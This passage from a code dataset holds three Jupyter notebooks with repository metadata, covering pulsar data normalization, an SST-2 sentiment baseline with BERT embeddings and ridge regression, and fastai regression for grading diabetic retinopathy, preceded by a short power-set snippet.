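The Subsets record above builds the power set by cross-joining each new element with the partial results already found. The same task can be sketched with the standard library alone (illustrative only; `subsets_itertools` is not part of the notebook):

```python
from itertools import combinations
from typing import List

def subsets_itertools(nums: List[int]) -> List[List[int]]:
    """Return the power set of a list of distinct integers."""
    out: List[List[int]] = []
    for k in range(len(nums) + 1):               # subsets of every size 0..n
        out.extend(list(c) for c in combinations(nums, k))
    return out

print(subsets_itertools([1, 2, 3]))              # 8 subsets, from [] up to [1, 2, 3]
```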
cb5262254cd7fd1264f7bd9a5f0f07c4b3549a9a | 81,352 | ipynb | Jupyter Notebook | Work_1_ver_1.ipynb | kuunal-mahtani/CTA200kmahtani | 7e7aea448e947028f7dc5d1ba8ecaab47b2b986d | [
"MIT"
] | null | null | null | Work_1_ver_1.ipynb | kuunal-mahtani/CTA200kmahtani | 7e7aea448e947028f7dc5d1ba8ecaab47b2b986d | [
"MIT"
] | null | null | null | Work_1_ver_1.ipynb | kuunal-mahtani/CTA200kmahtani | 7e7aea448e947028f7dc5d1ba8ecaab47b2b986d | [
"MIT"
] | null | null | null | 237.177843 | 56,184 | 0.911557 | [
[
[
"import numpy as np\n%matplotlib inline\nimport matplotlib.pyplot as plt",
"_____no_output_____"
],
[
"def normalize(fold_data,icount_data): #creating function for normalizing folded pulse data\n \n norm_data = np.zeros_like(fold_data) #initializing array for normalized data\n \n for i in range(len(fold_data[:,:,:])): #looping over how ever many itterations within the folded data necessary to fill norm_data\n norm_data[:,:,:,i] = fold_data[:,:,:,i]/icount_data[:,:,:] #normalizing data\n \n return norm_data",
"_____no_output_____"
],
[
"start = \"arochime-invpfbB0329+54_32768chan3ntbin\"\nfold = \"foldspec_2018-08-16T10:\"\nicount = \"icount_2018-08-16T10:\"\nend = \".000+30.000000000000004sec\"\n\n#final code will look something like:\n#need to add plotting line, need to add second for loop for strings with :00 instead of :30\n# i = 0\n# for filename in filenames:\n# fold = np.load(start+fold+str(i+38)+\":\"+str(30)+end+\".npy\")\n# count = np.load(start+icount+str(i+38)+\":\"+str(30)+end+\".npy\")\n# norm = normalize(fold,count)\n# #plotting line\n# plt.savefig(start+fold+str(i+38)+\":\"+str(30)+end+\".png\")\n# i = i+1\n \ntest = np.load(start+fold+str(38)+\":\"+str(30)+end+\".npy\")",
"_____no_output_____"
],
[
"#what metadata reads:\n #arochime - data from arochime\n #invpfb - something specific to arochime???????\n #B0329+54 - pulsar name\n #32768 - number of entries in the frequency axis\n #chan3t - ???????????\n #foldspec/icount - folded pulse signals or icount data\n #_2018_08-16 - date at which data was taken\n #T - time\n #10:38:30.00 - 10 O'clock and 38 minutes and 30 seconds\n #30.000000000000004sec - data taken over 30 second interval?????????\n #.npy - filetype\ndata1 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:38:30.000+30.000000000000004sec.npy\")\ndata2 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:38:30.000+30.000000000000004sec.npy\")\ndata3 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinfoldspec_2018-08-16T10:39:00.000+30.000000000000004sec.npy\")\ndata4 = np.load(\"arochime-invpfbB0329+54_32768chan3ntbinicount_2018-08-16T10:39:00.000+30.000000000000004sec.npy\")",
"_____no_output_____"
],
[
"new_data = normalize(data1,data2)\n#print(new_data[0,0,:,0]) #phase x\n#print(new_data[0,:,0,0]) #freuecy y\n#plt.plot(new_data[0,0,:,0],new_data[0,:,0,0])",
"_____no_output_____"
],
[
"ndata = np.zeros_like(data2)\nndata2 = np.zeros_like(data1)\n\nfor i in range(len(data1[:,:,:])):\n ndata2[:,:,:,i] = data1[:,:,:,i]/data2[:,:,:]\n\n#print(ndata2)",
"_____no_output_____"
],
[
"#################### EVERYTHING BELOW IS SCRATCH WORK ############################",
"_____no_output_____"
],
[
"len(data1)\nprint(data1[0,:,0,0])\n#print(data1[0,0,:,0])\nprint(data1[:,0,1,0])",
"[20.894543 22.04368 23.128796 ... 35.283733 35.07841 34.861423]\n[19.661644 20.953207 16.106157]\n"
],
[
"plt.figure(figsize=(16,9))\nfor i in range(len(data1)):\n for j in range(len(data1[0,0,:,0])):\n plt.plot(data2[i,:,j],data1[i,:,j,0], 'o')\n #plt.xlim(237,240)\nplt.savefig('fig1.png')\n%time",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 10.3 µs\n"
],
[
"%time\n#test1 = np.zeros_like(data1)\ninterm = np.zeros_like(data1)\nfor i in range(len(data1)):\n for j in range(len(data1[0,0,:,0])):\n test1[i,:,j,0] = test1[i,:,j,0]+data1[i,:,j,0]\n #plt.xlim(237,240)",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 19.1 µs\n"
],
[
"%time\n#test1 = np.zeros_like(data1)\ntest_01 = np.zeros(len(data1[0,:,0,0]))\ninterm = np.zeros_like(data1)\nfor i in range(len(data1)):\n for j in range(len(data1[0,0,:,0])):\n test_01 = test_01+data1[i,:,j,0]\n #plt.xlim(237,240)",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 11.9 µs\n"
],
[
"plt.figure(figsize=(16,9))\nfor i in range(len(data1)):\n plt.plot(data2[i,:,0],test_01, 'o')\nplt.savefig('fig2.png')\n%time",
"CPU times: user 0 ns, sys: 0 ns, total: 0 ns\nWall time: 9.78 µs\n"
],
[
"print(len(test1[0,0,:,0]))",
"512\n"
],
[
"plt.figure(figsize=(16,9))\nfor i in range(len(data1)):\n plt.plot(data2[i,:,j],test1[i,:,j,0], 'o')\nplt.savefig('fig2.png')\n%time",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
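The pulse-folding record above normalizes a 4-D `foldspec` array by a 3-D `icount` array with explicit Python loops. The same operation can be written with NumPy broadcasting; the shapes below are assumptions based on the notebook's printouts (a length-3 first axis, a long frequency axis, and a trailing polarization-like axis), not documented facts about the data.

```python
import numpy as np

def normalize_foldspec(foldspec: np.ndarray, icount: np.ndarray) -> np.ndarray:
    """Divide folded power by the per-bin sample count via broadcasting.

    Assumed shapes: foldspec (ntbin, nfreq, nphase, npol), icount (ntbin, nfreq, nphase).
    """
    with np.errstate(divide="ignore", invalid="ignore"):
        norm = foldspec / icount[..., np.newaxis]          # trailing axis broadcasts over npol
    # Bins with icount == 0 produce NaN/inf; map them to 0 so plots stay finite.
    return np.nan_to_num(norm, nan=0.0, posinf=0.0, neginf=0.0)

# Quick self-check with small random arrays:
fs = np.random.rand(3, 16, 8, 4)
ic = np.random.randint(1, 5, size=(3, 16, 8))
assert normalize_foldspec(fs, ic).shape == fs.shape
```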
cb52871656197e43ea5d747ce7024cc133992ff7 | 26,460 | ipynb | Jupyter Notebook | notebooks_paper_2022/Baselines_v2/SST-2.ipynb | PlaytikaResearch/esntorch | 585369853e2bb7c46d782fd10469dd30597de2e3 | [
"MIT"
] | 1 | 2021-10-06T07:42:01.000Z | 2021-10-06T07:42:01.000Z | notebooks_paper_2022/Baselines_v2/SST-2.ipynb | PlaytikaResearch/esntorch | 585369853e2bb7c46d782fd10469dd30597de2e3 | [
"MIT"
] | null | null | null | notebooks_paper_2022/Baselines_v2/SST-2.ipynb | PlaytikaResearch/esntorch | 585369853e2bb7c46d782fd10469dd30597de2e3 | [
"MIT"
] | null | null | null | 39.2 | 471 | 0.591232 | [
[
[
"# SST-2\n# Simple Baselines using ``mean`` and ``last`` pooling",
"_____no_output_____"
],
[
"## Librairies",
"_____no_output_____"
]
],
[
[
"# !pip install transformers==4.8.2\n# !pip install datasets==1.7.0\n# !pip install ax-platform==0.1.20",
"_____no_output_____"
],
[
"import os\nimport sys\nsys.path.insert(0, os.path.abspath(\"../..\")) # comment this if library is pip installed",
"_____no_output_____"
],
[
"import io\nimport re\nimport pickle\nfrom timeit import default_timer as timer\n\nfrom tqdm.notebook import tqdm\n\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nfrom datasets import load_dataset, Dataset, concatenate_datasets\nfrom transformers import AutoTokenizer\nfrom transformers import BertModel\nfrom transformers.data.data_collator import DataCollatorWithPadding\n\nfrom ax import optimize\nfrom ax.plot.contour import plot_contour\nfrom ax.plot.trace import optimization_trace_single_method\nfrom ax.service.managed_loop import optimize\nfrom ax.utils.notebook.plotting import render, init_notebook_plotting\n\nimport esntorch.core.reservoir as res\nimport esntorch.core.learning_algo as la\nimport esntorch.core.merging_strategy as ms\nimport esntorch.core.esn as esn",
"_____no_output_____"
],
[
"%config Completer.use_jedi = False\n%load_ext autoreload\n%autoreload 2",
"_____no_output_____"
],
[
"device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice",
"_____no_output_____"
],
[
"SEED = 42",
"_____no_output_____"
]
],
[
[
"## Global variables",
"_____no_output_____"
]
],
[
[
"CACHE_DIR = '~/Data/huggignface/' # put your path here\nRESULTS_FILE = 'Results/Baselines_v2/sst-2_results_.pkl' # put your path here",
"_____no_output_____"
]
],
[
[
"## Dataset",
"_____no_output_____"
]
],
[
[
"# download dataset\n\n# full train, mini train, and val sets\nraw_datasets = load_dataset('glue', 'sst2', cache_dir=CACHE_DIR)\nraw_datasets = raw_datasets.rename_column('sentence', 'text')\n\nfull_train_dataset = raw_datasets['train']\ntrain_dataset = full_train_dataset.train_test_split(train_size=0.3, shuffle=True)['train']\n\nval_dataset = raw_datasets['validation']\n\n# special test set\ntest_dataset = load_dataset('gpt3mix/sst2', split='test', cache_dir=CACHE_DIR)\n\ndef clean(example):\n example['text'] = example['text'].replace('-LRB-', '(').replace('-RRB-', ')').replace(r'\\/', r'/')\n example['label'] = np.abs(example['label'] - 1) # revert labels of test set\n return example\n\ntest_dataset = test_dataset.map(clean)\n\n# create dataset_d\ndataset_d = {}\n\ndataset_d = {\n 'full_train': full_train_dataset,\n 'train': train_dataset,\n 'val': val_dataset,\n 'test': test_dataset\n }",
"_____no_output_____"
],
[
"dataset_d",
"_____no_output_____"
],
[
"# tokenize\n\ntokenizer = AutoTokenizer.from_pretrained(\"bert-base-uncased\")\n\ndef tokenize_function(examples):\n return tokenizer(examples[\"text\"], padding=False, truncation=True, return_length=True)\n\nfor k, v in dataset_d.items():\n tmp = v.map(tokenize_function, batched=True)\n tmp = tmp.rename_column('length', 'lengths')\n tmp = tmp.sort(\"lengths\")\n tmp = tmp.rename_column('label', 'labels')\n tmp.set_format(type='torch', columns=['input_ids', 'attention_mask', 'labels', 'lengths'])\n \n dataset_d[k] = tmp\n\n# dataloaders\n\ndataloader_d = {}\n\nfor k, v in dataset_d.items():\n dataloader_d[k] = torch.utils.data.DataLoader(v, batch_size=256, collate_fn=DataCollatorWithPadding(tokenizer))",
"_____no_output_____"
],
[
"dataset_d",
"_____no_output_____"
]
],
[
[
"## Optimization",
"_____no_output_____"
]
],
[
[
"baseline_params = {\n 'embedding_weights': 'bert-base-uncased', # TEXT.vocab.vectors,\n 'distribution' : 'uniform', # uniform, gaussian\n 'input_dim' : 768, # dim of encoding!\n 'reservoir_dim' : 0, # not used\n 'bias_scaling' : 0.0, # not used\n 'sparsity' : 0.0, # not used\n 'spectral_radius' : None, \n 'leaking_rate': 0.5, # not used\n 'activation_function' : 'tanh',\n 'input_scaling' : 0.1,\n 'mean' : 0.0,\n 'std' : 1.0,\n 'learning_algo' : None,\n 'criterion' : None,\n 'optimizer' : None,\n 'merging_strategy' : None,\n 'lexicon' : None,\n 'bidirectional' : False,\n 'mode' : 'no_layer', # simple baseline\n 'device' : device,\n 'seed' : 4\n }",
"_____no_output_____"
],
[
"results_d = {}\n\nfor pooling_strategy in tqdm(['last', 'mean']):\n \n results_d[pooling_strategy] = {}\n \n for alpha in tqdm([0.1, 1.0, 10.0, 100.0]):\n \n results_d[pooling_strategy][alpha] = []\n \n # model\n baseline_params['merging_strategy'] = pooling_strategy\n baseline_params['mode'] = 'no_layer'\n print(baseline_params)\n ESN = esn.EchoStateNetwork(**baseline_params)\n ESN.learning_algo = la.RidgeRegression(alpha=alpha)\n ESN = ESN.to(device)\n\n # train\n t0 = timer()\n LOSS = ESN.fit(dataloader_d[\"full_train\"]) # full train set\n t1 = timer()\n acc = ESN.predict(dataloader_d[\"test\"], verbose=False)[1].item() # full test set\n\n # results\n results_d[pooling_strategy][alpha].append([acc, t1 - t0])\n \n # clean objects\n del ESN.learning_algo\n del ESN.criterion\n del ESN.merging_strategy\n del ESN\n torch.cuda.empty_cache()",
"_____no_output_____"
],
[
"results_d",
"_____no_output_____"
]
],
[
[
"## Results",
"_____no_output_____"
]
],
[
[
"# save results\n\nwith open(RESULTS_FILE, 'wb') as fh:\n pickle.dump(results_d, fh)",
"_____no_output_____"
],
[
"# # load results\n# with open(os.path.join(RESULTS_PATH, RESULTS_FILE), 'rb') as fh:\n# results_d = pickle.load(fh)",
"_____no_output_____"
],
[
"# results_d",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
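The SST-2 record above compares `last` and `mean` pooling baselines with a ridge-regression readout, but the pooling itself happens inside the project's `esntorch` classes, whose code is not shown here. As a generic illustration only (not that library's implementation), masked mean pooling over transformer token embeddings looks like this:

```python
import torch

def masked_mean_pool(hidden: torch.Tensor, attention_mask: torch.Tensor) -> torch.Tensor:
    """Average token embeddings while ignoring padding positions.

    hidden         : (batch, seq_len, dim) token embeddings
    attention_mask : (batch, seq_len) with 1 for real tokens, 0 for padding
    """
    mask = attention_mask.unsqueeze(-1).type_as(hidden)   # (batch, seq_len, 1)
    summed = (hidden * mask).sum(dim=1)                   # zero out padding, then sum
    counts = mask.sum(dim=1).clamp(min=1e-9)              # avoid division by zero
    return summed / counts                                # (batch, dim)

# Example: batch of 2 sequences, 5 tokens, 768-dim embeddings
h = torch.randn(2, 5, 768)
m = torch.tensor([[1, 1, 1, 0, 0], [1, 1, 1, 1, 1]])
print(masked_mean_pool(h, m).shape)                       # torch.Size([2, 768])
```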
cb5294c798a2286ccb71fff39441d396977818f4 | 359,202 | ipynb | Jupyter Notebook | nbs/CvCropDiabtrn070314.ipynb | yang-zhang/aptos2019-blindness-detection | 9f06be13ea468e5977e0552c0de1a1f8dbe836dc | [
"Apache-2.0"
] | null | null | null | nbs/CvCropDiabtrn070314.ipynb | yang-zhang/aptos2019-blindness-detection | 9f06be13ea468e5977e0552c0de1a1f8dbe836dc | [
"Apache-2.0"
] | null | null | null | nbs/CvCropDiabtrn070314.ipynb | yang-zhang/aptos2019-blindness-detection | 9f06be13ea468e5977e0552c0de1a1f8dbe836dc | [
"Apache-2.0"
] | null | null | null | 167.773003 | 219,356 | 0.892913 | [
[
[
"- https://www.kaggle.com/tanlikesmath/intro-aptos-diabetic-retinopathy-eda-starter\n- https://medium.com/@btahir/a-quick-guide-to-using-regression-with-image-data-in-fastai-117304c0af90\n- add diabetic-retinopathy-detection training data (cropped)",
"_____no_output_____"
],
[
"# params",
"_____no_output_____"
]
],
[
[
"PRFX = 'CvCropDiabtrn070314'\np_prp = '../output/Prep0703'\np_o = f'../output/{PRFX}'\n\nSEED = 111\n\ndbg = False\nif dbg:\n dbgsz = 500\n\nBS = 256\nSZ = 224\nFP16 = True\n\nimport multiprocessing\nmultiprocessing.cpu_count() # 2\n\n\nfrom fastai.vision import *\nxtra_tfms = []\n# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]\n\nparams_tfms = dict(\n do_flip=True,\n flip_vert=False,\n max_rotate=10,\n max_warp=0,\n max_zoom=1.1,\n p_affine=0.5,\n max_lighting=0.2,\n p_lighting=0.5,\n xtra_tfms=xtra_tfms)\n\nresize_method = ResizeMethod.CROP\npadding_mode = 'zeros'\n\nUSE_TTA = True",
"_____no_output_____"
]
],
[
[
"# setup",
"_____no_output_____"
]
],
[
[
"import fastai\nprint('fastai.__version__: ', fastai.__version__)\n\nimport random \nimport numpy as np\nimport torch\nimport os\n\ndef set_torch_seed(seed=SEED):\n os.environ['PYTHONHASHSEED'] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n \n if torch.cuda.is_available(): \n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) \n torch.backends.cudnn.deterministic = True \n torch.backends.cudnn.benchmark = False\n\nset_torch_seed()",
"fastai.__version__: 1.0.54\n"
],
[
"from fastai import *\nfrom fastai.vision import *\nimport pandas as pd\n\nimport scipy as sp\nfrom sklearn.metrics import cohen_kappa_score\n\ndef quadratic_weighted_kappa(y1, y2):\n return cohen_kappa_score(y1, y2, weights='quadratic')",
"_____no_output_____"
]
],
[
[
"# preprocess",
"_____no_output_____"
]
],
[
[
"img2grd = []\n\np = '../input/aptos2019-blindness-detection'\npp = Path(p)\ntrain = pd.read_csv(pp/'train.csv')\ntest = pd.read_csv(pp/'test.csv')\nlen_blnd = len(train)\nlen_blnd_test = len(test)\n\nimg2grd_blnd = [(f'{p_prp}/aptos2019-blindness-detection/train_images/{o[0]}.png',o[1]) for o in train.values]\n\nlen_blnd, len_blnd_test",
"_____no_output_____"
],
[
"img2grd += img2grd_blnd\ndisplay(len(img2grd))\ndisplay(Counter(o[1] for o in img2grd).most_common())",
"_____no_output_____"
],
[
"p = '../input/diabetic-retinopathy-detection'\npp = Path(p)\ntrain=pd.read_csv(pp/'trainLabels.csv')\n\nimg2grd_diab_train=[(f'{p_prp}/diabetic-retinopathy-detection/train_images/{o[0]}.jpeg',o[1]) for o in train.values]\nimg2grd += img2grd_diab_train\ndisplay(len(img2grd))\ndisplay(Counter(o[1] for o in img2grd).most_common())",
"_____no_output_____"
],
[
"if np.all([Path(o[0]).exists() for o in img2grd]): print('All files are here!')",
"All files are here!\n"
],
[
"df = pd.DataFrame(img2grd)\ndf.columns = ['fnm', 'target']\n\ndf.shape",
"_____no_output_____"
],
[
"set_torch_seed()\nidx_blnd_train = np.where(df.fnm.str.contains('aptos2019'))[0]\nidx_val = np.random.choice(idx_blnd_train, len_blnd_test, replace=False)\ndf['is_val']=False\ndf.loc[idx_val, 'is_val']=True\n\nif dbg:\n df=df.head(dbgsz)",
"_____no_output_____"
]
],
[
[
"# dataset",
"_____no_output_____"
]
],
[
[
"tfms = get_transforms(**params_tfms)\n\ndef get_data(sz, bs):\n src = (ImageList.from_df(df=df,path='./',cols='fnm') \n .split_from_df(col='is_val') \n .label_from_df(cols='target', \n label_cls=FloatList)\n )\n\n data= (src.transform(tfms,\n size=sz,\n resize_method=resize_method,\n padding_mode=padding_mode) #Data augmentation\n .databunch(bs=bs) #DataBunch\n .normalize(imagenet_stats) #Normalize \n )\n return data\n\nbs = BS \nsz = SZ\nset_torch_seed()\ndata = get_data(sz, bs)",
"_____no_output_____"
],
[
"data.show_batch(rows=3, figsize=(7,6))",
"_____no_output_____"
]
],
[
[
"# model",
"_____no_output_____"
]
],
[
[
"%%time\n# Downloading: \"https://download.pytorch.org/models/resnet50-19c8e357.pth\" to /tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth\n\n# Making pretrained weights work without needing to find the default filename\nif not os.path.exists('/tmp/.cache/torch/checkpoints/'):\n os.makedirs('/tmp/.cache/torch/checkpoints/')\n!cp '../input/pytorch-vision-pretrained-models/resnet50-19c8e357.pth' '/tmp/.cache/torch/checkpoints/resnet50-19c8e357.pth'",
"CPU times: user 3.36 ms, sys: 52.1 ms, total: 55.5 ms\nWall time: 1.01 s\n"
],
[
"learn = cnn_learner(data, \n base_arch = models.resnet50, \n path=p_o, ps=0.2)\nlearn.loss = MSELossFlat\n\nif FP16: learn = learn.to_fp16()",
"_____no_output_____"
],
[
"%%time\nlearn.freeze()\nlearn.lr_find()",
"_____no_output_____"
],
[
"learn.recorder.plot(suggestion=True)",
"Min numerical gradient: 2.75E-02\nMin loss divided by 10: 8.32E-03\n"
],
[
"learn.recorder.plot()",
"_____no_output_____"
],
[
"set_torch_seed()\nlearn.fit_one_cycle(4, max_lr = 1e-2)",
"_____no_output_____"
],
[
"learn.recorder.plot_losses()\n# learn.recorder.plot_metrics()",
"_____no_output_____"
],
[
"learn.save('mdl-frozen')",
"_____no_output_____"
],
[
"learn.unfreeze()",
"_____no_output_____"
],
[
"%%time\nlearn.lr_find()\nlearn.recorder.plot(suggestion=True)",
"_____no_output_____"
],
[
"set_torch_seed()\nlearn.fit_one_cycle(6, max_lr=slice(1e-6,1e-3))\n",
"_____no_output_____"
],
[
"!nvidia-smi",
"Thu Jul 4 00:02:34 2019 \r\n+-----------------------------------------------------------------------------+\r\n| NVIDIA-SMI 418.56 Driver Version: 418.56 CUDA Version: 10.1 |\r\n|-------------------------------+----------------------+----------------------+\r\n| GPU Name Persistence-M| Bus-Id Disp.A | Volatile Uncorr. ECC |\r\n| Fan Temp Perf Pwr:Usage/Cap| Memory-Usage | GPU-Util Compute M. |\r\n|===============================+======================+======================|\r\n| 0 Tesla V100-SXM2... Off | 00000000:00:1E.0 Off | 0 |\r\n| N/A 49C P0 55W / 300W | 13815MiB / 16130MiB | 0% Default |\r\n+-------------------------------+----------------------+----------------------+\r\n \r\n+-----------------------------------------------------------------------------+\r\n| Processes: GPU Memory |\r\n| GPU PID Type Process name Usage |\r\n|=============================================================================|\r\n+-----------------------------------------------------------------------------+\r\n"
],
[
"learn.recorder.plot_losses()\n# learn.recorder.plot_metrics()",
"_____no_output_____"
],
[
"learn.save('mdl')",
"_____no_output_____"
]
],
[
[
"# validate and thresholding",
"_____no_output_____"
]
],
[
[
"learn = learn.to_fp32()\n\nlearn = learn.load('mdl')",
"_____no_output_____"
],
[
"%%time\nset_torch_seed()\npreds_val_tta, y_val = learn.TTA(ds_type=DatasetType.Valid)",
"_____no_output_____"
],
[
"%%time\nset_torch_seed()\npreds_val, y_val = learn.get_preds(ds_type=DatasetType.Valid)",
"CPU times: user 1.64 s, sys: 1.42 s, total: 3.06 s\nWall time: 57 s\n"
],
[
"preds_val = preds_val.numpy().squeeze()\npreds_val_tta = preds_val_tta.numpy().squeeze()\ny_val= y_val.numpy()",
"_____no_output_____"
],
[
"np.save(f'{p_o}/preds_val.npy', preds_val)\nnp.save(f'{p_o}/preds_val_tta.npy', preds_val_tta)\nnp.save(f'{p_o}/y_val.npy', y_val)",
"_____no_output_____"
],
[
"# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/88773#latest-515044\n# We used OptimizedRounder given by hocop1. https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970\n# put numerical value to one of bins\ndef to_bins(x, borders):\n for i in range(len(borders)):\n if x <= borders[i]:\n return i\n return len(borders)\n\nclass Hocop1OptimizedRounder(object):\n def __init__(self):\n self.coef_ = 0\n\n def _loss(self, coef, X, y, idx):\n X_p = np.array([to_bins(pred, coef) for pred in X])\n ll = -quadratic_weighted_kappa(y, X_p)\n return ll\n\n def fit(self, X, y):\n coef = [1.5, 2.0, 2.5, 3.0]\n golden1 = 0.618\n golden2 = 1 - golden1\n ab_start = [(1, 2), (1.5, 2.5), (2, 3), (2.5, 3.5)]\n for it1 in range(10):\n for idx in range(4):\n # golden section search\n a, b = ab_start[idx]\n # calc losses\n coef[idx] = a\n la = self._loss(coef, X, y, idx)\n coef[idx] = b\n lb = self._loss(coef, X, y, idx)\n for it in range(20):\n # choose value\n if la > lb:\n a = b - (b - a) * golden1\n coef[idx] = a\n la = self._loss(coef, X, y, idx)\n else:\n b = b - (b - a) * golden2\n coef[idx] = b\n lb = self._loss(coef, X, y, idx)\n self.coef_ = {'x': coef}\n\n def predict(self, X, coef):\n X_p = np.array([to_bins(pred, coef) for pred in X])\n return X_p\n\n def coefficients(self):\n return self.coef_['x']",
"_____no_output_____"
],
[
"# https://www.kaggle.com/c/petfinder-adoption-prediction/discussion/76107#480970\nclass AbhishekOptimizedRounder(object):\n def __init__(self):\n self.coef_ = 0\n\n def _kappa_loss(self, coef, X, y):\n X_p = np.copy(X)\n for i, pred in enumerate(X_p):\n if pred < coef[0]:\n X_p[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n X_p[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n X_p[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n X_p[i] = 3\n else:\n X_p[i] = 4\n\n ll = quadratic_weighted_kappa(y, X_p)\n return -ll\n\n def fit(self, X, y):\n loss_partial = partial(self._kappa_loss, X=X, y=y)\n initial_coef = [0.5, 1.5, 2.5, 3.5]\n self.coef_ = sp.optimize.minimize(loss_partial, initial_coef, method='nelder-mead')\n\n def predict(self, X, coef):\n X_p = np.copy(X)\n for i, pred in enumerate(X_p):\n if pred < coef[0]:\n X_p[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n X_p[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n X_p[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n X_p[i] = 3\n else:\n X_p[i] = 4\n return X_p\n\n def coefficients(self):\n return self.coef_['x']",
"_____no_output_____"
],
[
"def bucket(preds_raw, coef = [0.5, 1.5, 2.5, 3.5]):\n preds = np.zeros(preds_raw.shape)\n for i, pred in enumerate(preds_raw):\n if pred < coef[0]:\n preds[i] = 0\n elif pred >= coef[0] and pred < coef[1]:\n preds[i] = 1\n elif pred >= coef[1] and pred < coef[2]:\n preds[i] = 2\n elif pred >= coef[2] and pred < coef[3]:\n preds[i] = 3\n else:\n preds[i] = 4\n return preds",
"_____no_output_____"
],
[
"optnm2coefs = {'simple': [0.5, 1.5, 2.5, 3.5]}",
"_____no_output_____"
],
[
"%%time\nset_torch_seed()\noptR = Hocop1OptimizedRounder()\noptR.fit(preds_val_tta, y_val)\noptnm2coefs['hocop1_tta'] = optR.coefficients()",
"CPU times: user 13.9 s, sys: 0 ns, total: 13.9 s\nWall time: 13.9 s\n"
],
[
"%%time\nset_torch_seed()\noptR = Hocop1OptimizedRounder()\noptR.fit(preds_val, y_val)\noptnm2coefs['hocop1'] = optR.coefficients()",
"CPU times: user 13.8 s, sys: 0 ns, total: 13.8 s\nWall time: 13.8 s\n"
],
[
"%%time\nset_torch_seed()\noptR = AbhishekOptimizedRounder()\noptR.fit(preds_val_tta, y_val)\noptnm2coefs['abhishek_tta'] = optR.coefficients()",
"CPU times: user 1.86 s, sys: 0 ns, total: 1.86 s\nWall time: 1.86 s\n"
],
[
"%%time\nset_torch_seed()\noptR = AbhishekOptimizedRounder()\noptR.fit(preds_val, y_val)\noptnm2coefs['abhishek'] = optR.coefficients()",
"CPU times: user 1.8 s, sys: 0 ns, total: 1.8 s\nWall time: 1.79 s\n"
],
[
"optnm2coefs",
"_____no_output_____"
],
[
"optnm2preds_val_grd = {k: bucket(preds_val, coef) for k,coef in optnm2coefs.items()}\noptnm2qwk = {k: quadratic_weighted_kappa(y_val, preds) for k,preds in optnm2preds_val_grd.items()}",
"_____no_output_____"
],
[
"optnm2qwk",
"_____no_output_____"
],
[
"Counter(y_val).most_common()",
"_____no_output_____"
],
[
"preds_val_grd = optnm2preds_val_grd['abhishek'].squeeze()",
"_____no_output_____"
],
[
"preds_val_grd.mean()",
"_____no_output_____"
],
[
"Counter(preds_val_grd).most_common()",
"_____no_output_____"
],
[
"list(zip(preds_val_grd, y_val))[:10]",
"_____no_output_____"
],
[
"(preds_val_grd== y_val.squeeze()).mean()",
"_____no_output_____"
],
[
"pickle.dump(optnm2qwk, open(f'{p_o}/optnm2qwk.p', 'wb'))\npickle.dump(optnm2preds_val_grd, open(f'{p_o}/optnm2preds_val_grd.p', 'wb'))\npickle.dump(optnm2coefs, open(f'{p_o}/optnm2coefs.p', 'wb'))",
"_____no_output_____"
]
],
[
[
"# testing",
"_____no_output_____"
],
[
"This goes to Kernel!!",
"_____no_output_____"
],
[
"## params",
"_____no_output_____"
]
],
[
[
"PRFX = 'CvCropDiabtrn070314'\np_o = f'../output/{PRFX}'\n\nSEED = 111\n\ndbg = False\nif dbg:\n dbgsz = 500\n\nBS = 128\nSZ = 224\n\nfrom fastai.vision import *\nxtra_tfms = []\n# xtra_tfms += [rgb_randomize(channel=i, thresh=1e-4) for i in range(3)]\n\nparams_tfms = dict(\n do_flip=True,\n flip_vert=False,\n max_rotate=10,\n max_warp=0,\n max_zoom=1.1,\n p_affine=0.5,\n max_lighting=0.2,\n p_lighting=0.5,\n xtra_tfms=xtra_tfms)\n\nresize_method = ResizeMethod.CROP\npadding_mode = 'zeros'\n\nUSE_TTA = True\n\nimport fastai\nprint(fastai.__version__)",
"1.0.54\n"
]
],
[
[
"## setup",
"_____no_output_____"
]
],
[
[
"import fastai\nprint('fastai.__version__: ', fastai.__version__)\n\nimport random \nimport numpy as np\nimport torch\nimport os\n\ndef set_torch_seed(seed=SEED):\n os.environ['PYTHONHASHSEED'] = str(seed)\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n \n if torch.cuda.is_available(): \n torch.cuda.manual_seed(seed)\n torch.cuda.manual_seed_all(seed) \n torch.backends.cudnn.deterministic = True \n torch.backends.cudnn.benchmark = False\n\nset_torch_seed()",
"fastai.__version__: 1.0.54\n"
],
[
"from fastai import *\nfrom fastai.vision import *\nimport pandas as pd\n",
"_____no_output_____"
]
],
[
[
"## preprocess",
"_____no_output_____"
]
],
[
[
"img2grd = []",
"_____no_output_____"
],
[
